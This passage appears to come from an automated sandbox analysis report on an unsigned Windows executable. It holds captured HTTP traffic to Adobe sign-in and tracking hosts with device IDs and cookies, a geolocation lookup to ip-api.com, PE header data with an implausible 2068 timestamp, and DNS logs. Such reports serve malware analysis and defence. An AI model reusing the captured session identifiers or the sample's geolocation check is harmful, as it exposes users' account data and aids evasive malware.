en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A
Source: global traffic	HTTP traffic detected: GET /img/social/f_logo_RGB-Blue_58.png HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261 HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dpm.demdex.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/social/apple.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /img/social/sml-apple-logo.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id/rd?d_visid_ver=5.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=9E1005A551ED61CA0A490D45%40AdobeOrg&d_nsid=0&ts=1696437793261 HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dpm.demdex.netConnection: Keep-AliveCookie: demdex=86072171691128452991944543401542351402
Source: global traffic	HTTP traffic detected: GET /img/social/sml-google-logo.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /id?d_visid_ver=5.4.0&d_fieldgroup=A&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&mid=85912006310227639011924320131914567332&ts=1696437794901 HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedReferer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USOrigin: https://auth.services.adobe.comAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sstats.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444994s%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1
Source: global traffic	HTTP traffic detected: GET /signin/v2/configurations/CreativeCloudInstaller_v1_0 HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: sat_domain=A; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /signin/v2/configurations/CreativeCloudInstaller_v1_0/context?contextId=WAM1_PHSP_21&locale=en_US HTTP/1.1Accept: application/json, text/plain, /X-DEBUG-ID: dfe9ad98-0121-4e58-80a6-14b027bb059aX-IMS-CLIENTID: CreativeCloudInstaller_v1_0Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /img/canvas/Kaizen.jpg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /clients/WAM1_PHSP_21/2x_7ba438462e24c64004988f21d59129d5.png HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: static.adobelogin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/generic/jarvis_bubble_chat.svg HTTP/1.1Accept: /Referer: https://auth.services.adobe.com/en_US/index.html?delegated_auth_party=requester&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCreativeCloudInstaller_v1_0%2FAdobeID%2Fdevice%3Fredirect_uri%3Dhttps%253A%252F%252Foobe.adobe.com%252F%26state%3D%257B%2522ac%2522%253A%2522CCInstaller%2522%252C%2522av%2522%253A%25222.7.0.13%2522%257D%26device_id%3D53bd0868-e882-4020-bfb4-c5d428908b32%26device_name%3D562258%26code_challenge_method%3Dplain%26use_ms_for_expiry%3Dtrue&client_id=CreativeCloudInstaller_v1_0&scope=openid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&state=%7B%22ac%22%3A%22CCInstaller%22%2C%22av%22%3A%222.7.0.13%22%7D&relay=dfe9ad98-0121-4e58-80a6-14b027bb059a&locale=en_US&flow_type=device&ctx_id=WAM1_PHSP_21&idp_flow_type=login&ab_test=stop-mk-new-text&s_p=google%2Cfacebook%2Capple&response_type=device&device_name=562258&device_id=53bd0868-e882-4020-bfb4-c5d428908b32&code_challenge_method=plain&redirect_uri=https%3A%2F%2Foobe.adobe.com%2F&use_ms_for_expiry=trueAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: auth.services.adobe.comConnection: Keep-AliveCookie: AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1176715910%7CMCMID%7C85912006310227639011924320131914567332%7CMCAAMLH-1697042594%7C9%7CMCAAMB-1697042594%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1696444995s%7CNONE%7CMCAID%7CNONE%7CvVersion%7C5.4.0; AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; s_ecid=MCMID%7C85912006310227639011924320131914567332; gpv=Account:IMS:GetStarted:OnLoad; s_cc=true; relay=dfe9ad98-0121-4e58-80a6-14b027bb059a
Source: global traffic	HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Entrypoint:	0xaaa37e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB8EB3E69 [Mon Apr 23 16:38:01 2068 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6aa328	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6ac000	0x451a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6b2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6a8384	0x6a8400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6ac000	0x451a	0x4600	False	0.05412946428571429	data	2.6916023517769156	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6b2000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x6ac0f4	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m	0.03430562116202173
RT_GROUP_ICON	0x6b031c	0x14	data	1.1
RT_MANIFEST	0x6b0330	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2023 18:42:52.541642904 CEST	65279	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:42:52.696630955 CEST	53	65279	8.8.8.8	192.168.2.3
Oct 4, 2023 18:42:57.186873913 CEST	58193	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:42:57.345170021 CEST	53	58193	8.8.8.8	192.168.2.3
Oct 4, 2023 18:43:01.766675949 CEST	50382	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:43:14.340915918 CEST	49204	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:43:14.495515108 CEST	53	49204	8.8.8.8	192.168.2.3
Oct 4, 2023 18:43:14.545810938 CEST	52799	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:43:15.992017984 CEST	49650	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:43:17.672746897 CEST	55154	53	192.168.2.3	8.8.8.8
Oct 4, 2023 18:43:17.837692976 CEST	53	55154	8.8.8.8	192.168.2.3

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2023 18:42:52.261096001 CEST	8.8.8.8	192.168.2.3	0x5f55	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:52.261096001 CEST	8.8.8.8	192.168.2.3	0x5f55	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:52.261096001 CEST	8.8.8.8	192.168.2.3	0x5f55	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:52.696630955 CEST	8.8.8.8	192.168.2.3	0x7bc6	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:53.551769018 CEST	8.8.8.8	192.168.2.3	0x797d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:53.551769018 CEST	8.8.8.8	192.168.2.3	0x797d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:53.551769018 CEST	8.8.8.8	192.168.2.3	0x797d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.461208105 CEST	8.8.8.8	192.168.2.3	0x841d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.461208105 CEST	8.8.8.8	192.168.2.3	0x841d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.461208105 CEST	8.8.8.8	192.168.2.3	0x841d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.843048096 CEST	8.8.8.8	192.168.2.3	0xdb0e	No error (0)	d1n897799gitxr.cloudfront.net		13.226.224.37	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.843048096 CEST	8.8.8.8	192.168.2.3	0xdb0e	No error (0)	d1n897799gitxr.cloudfront.net		13.226.224.39	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.843048096 CEST	8.8.8.8	192.168.2.3	0xdb0e	No error (0)	d1n897799gitxr.cloudfront.net		13.226.224.49	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:55.843048096 CEST	8.8.8.8	192.168.2.3	0xdb0e	No error (0)	d1n897799gitxr.cloudfront.net		13.226.224.52	A (IP address)	IN (0x0001)	false
